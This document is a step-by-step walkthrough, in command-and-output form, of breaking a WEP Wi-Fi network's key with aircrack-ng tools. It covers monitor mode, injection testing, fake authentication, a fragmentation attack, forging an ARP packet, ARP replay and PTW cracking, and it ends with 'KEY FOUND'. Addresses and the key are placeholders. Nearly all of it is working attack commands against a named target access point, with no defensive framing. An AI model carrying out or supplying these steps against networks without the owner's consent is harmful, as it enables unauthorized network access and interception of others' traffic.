Interface name
  mon0
Interface MAC address
  AB:CD:EF:01:23:45
Target AP's ESSID
  Target
Target AP's MAC address
  01:23:45:67:89:AB
Target AP's channel
  9
Target AP's encryption
  WEP
Target AP's key
  12:34:56:78:90
Commands
  Create monitor device
    airmon-ng start wlan0
  Find target AP
    airodump-ng mon0
      user@root:~# airodump-ng mon0
      CH  9 ][ Elapsed: 0 s ][ 2012-09-13 14:17                          
									  
      BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER
									  
      01:23:45:67:89:AB  -127        3        0    0   9  54e. WEP  WEP  
									  
      BSSID              STATION            PWR   Rate    Lost    Frames 

      user@root:~#
  Target AP founded, switch to target AP's channel
    iwconfig mon0 channel 9
  Apply injection test to target AP
    aireplay-ng --test -a 01:23:45:67:89:AB mon0
      user@aircrack-ng# aireplay-ng -a 01:23:45:67:89:AB --test mon0
      14:30:38  Waiting for beacon frame (BSSID: 01:23:45:67:89:AB) on channel 9
      14:30:38  Trying broadcast probe requests...
      14:30:38  Injection is working!
      14:30:40  Found 1 AP 

      14:30:40  Trying directed probe requests...
      14:30:40  01:23:45:67:89:AB - channel: 9 - 'Target'
      14:30:40  Ping (min/avg/max): 1.288ms/15.225ms/20.741ms Power: -127.00
      14:30:40  29/30:  96%

      user@aircrack-ng#
  Apply fake auth. attack to target AP
    aireplay-ng -1 0 -a 01:23:45:67:89:AB mon0
      user@aircrack-ng# aireplay-ng -1 0 -a 01:23:45:67:89:AB mon0
      No source MAC (-h) specified. Using the device MAC (AB:CD:EF:01:23:45)
      14:30:47  Waiting for beacon frame (BSSID: 01:23:45:67:89:AB) on channel 9

      14:30:47  Sending Authentication Request (Open System) [ACK]
      14:30:47  Authentication successful
      14:30:47  Sending Association Request [ACK]
      14:30:47  Association successful :-) (AID: 1)

      user@aircrack-ng#
  Apply fragment attack to target AP
    aireplay-ng --fragment -b 01:23:45:67:89:AB mon0
      user@aircrack-ng# aireplay-ng --fragment -b 01:23:45:67:89:AB mon0
      No source MAC (-h) specified. Using the device MAC (AB:CD:EF:01:23:45)
      14:30:55  Waiting for beacon frame (BSSID: 01:23:45:67:89:AB) on channel 9
      14:30:55  Waiting for a data packet...
      Read 204 packets...

	      Size: 332, FromDS: 1, ToDS: 0 (WEP)

		    BSSID  =  01:23:45:67:89:AB
		Dest. MAC  =  01:00:5E:7F:FF:FA
	      Source MAC  =  01:23:45:67:89:AB

	      0x0000:  0842 0000 0100 5e7f fffa 74ea 3aab 111a  .B....^..t.:...
	      0x0010:  74ea 3aab 111a d00e 5b42 7500 5236 71c2  t.:.....[Bu.R6q.
	      0x0020:  0e02 f0cc b438 107e e2cb ebfb bfd3 557a  .....8.~......Uz
	      0x0030:  4a5c 8495 dfd0 1d42 c404 a987 9e49 0175  J\.....B.....I.u
	      0x0040:  1e5f 408a 35b9 7734 bbcc b3a5 7cf9 0887  ._@.5.w4....|...
	      0x0050:  8a7b e49e b946 2f42 c60d c2bb b6da c343  .{...F/B.......C
	      0x0060:  6ee8 a51d 3197 62ce b4f6 1b97 3914 38dd  n...1.b.....9.8.
	      0x0070:  b163 6210 1395 3572 cc4a 1760 4b01 645c  .cb...5r.J.`K.d\
	      0x0080:  ba46 f878 987e eaa3 c971 aec2 ef32 827b  .F.x.~...q...2.{
	      0x0090:  b7b1 9137 40a6 ad02 ac9a 3896 3b7d d1c0  ...7@.....8.;}..
	      0x00a0:  d13e ccfd 8f32 1bf5 32d7 b342 e291 ea11  .>...2..2..B....
	      0x00b0:  5f5b 353b 052d 9a59 0d2a 06d2 aa01 a22c  _[5;.-.Y.*.....,
	      0x00c0:  9a89 9afd 6eb0 c184 64c3 6f09 6f0f 33dc  ....n...d.o.o.3.
	      0x00d0:  7e92 d325 bcc2 beeb 23e2 24b1 3bf1 a7ad  ~..%....#.$.;...
	      --- CUT ---

      Use this packet ? y

      Saving chosen packet in replay_src-0913-143107.cap
      14:31:12  Data packet found!
      14:31:12  Sending fragmented packet
      14:31:12  Got RELAYED packet!!
      14:31:12  Trying to get 384 bytes of a keystream
      14:31:12  Got RELAYED packet!!
      14:31:12  Trying to get 1500 bytes of a keystream
      14:31:13  Got RELAYED packet!!
      Saving keystream in fragment-0913-143112.xor
      Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
      user@aircrack-ng#
  Making ARP request packet for ARP replay attack
    packetforge-ng --arp -a 01:23:45:67:89:AB -h 01:23:45:67:89:AB -k 255.255.255.0 -l 255.255.255.0 -y fragment-0913-143112.xor -w ARPrequest01.packet
      user@aircrack-ng# packetforge-ng --arp -a 01:23:45:67:89:AB -h AB:CD:EF:01:23:45 -k 255.255.255.0 -l 255.255.255.0 -y fragment-0913-143112.xor -w ARPrequest01.packet
      Wrote packet to: ARPrequest01.packet
      user@aircrack-ng#
  Start dumping target AP's packets
    airodump-ng --write dump01 --channel 9 --bssid 01:23:45:67:89:AB mon0
  Start replaying ARP request packet to the target AP
    aireplay-ng --arpreplay -r ARPrequest01.packet -b 01:23:45:67:89:AB mon0
      Read 334875 packets (got 104078 ARP requests and 111579 ACKs), sent 1
  Start cracking WEP key from the dumped packets
    aircrack-ng -a 1 --bssid 01:23:45:67:89:AB dump*.cap
      user@aircrack-ng# aircrack-ng -a 1 --bssid 01:23:45:67:89:AB dump*.cap
      Opening dump01-01.cap
      Attack will be restarted every 5000 captured ivs.
      Starting PTW attack with 99255 ivs.
			      KEY FOUND! [ 12:34:56:78:90 ] 
	      Decrypted correctly: 100%
